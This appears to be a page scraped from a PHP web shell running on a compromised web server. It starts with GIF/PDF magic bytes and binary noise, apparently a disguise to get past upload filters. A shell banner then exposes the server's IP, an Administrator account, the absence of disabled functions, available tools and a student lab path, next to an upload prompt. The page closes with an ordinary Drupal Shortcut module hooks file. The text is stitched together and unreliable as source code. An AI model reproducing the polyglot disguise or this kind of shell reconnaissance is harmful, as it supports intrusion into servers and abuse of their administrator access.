GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/modules/shortcut/ |
Upload File : |
<?php /** * @file * Hooks provided by the Shortcut module. */ /** * @addtogroup hooks * @{ */ /** * Return the name of a default shortcut set for the provided user account. * * This hook allows modules to define default shortcut sets for a particular * user that differ from the site-wide default (for example, a module may want * to define default shortcuts on a per-role basis). * * The default shortcut set is used only when the user does not have any other * shortcut set explicitly assigned to them. * * Note that only one default shortcut set can exist per user, so when multiple * modules implement this hook, the last (i.e., highest weighted) module which * returns a valid shortcut set name will prevail. * * @param $account * The user account whose default shortcut set is being requested. * @return string * The name of the shortcut set that this module recommends for that user, if * there is one. */ function hook_shortcut_default_set($account) { // Use a special set of default shortcuts for administrators only. $roles = \Drupal::entityManager()->getStorage('user_role')->loadByProperties(['is_admin' => TRUE]); $user_admin_roles = array_intersect(array_keys($roles), $account->getRoles()); if ($user_admin_roles) { return 'admin-shortcuts'; } } /** * @} End of "addtogroup hooks". */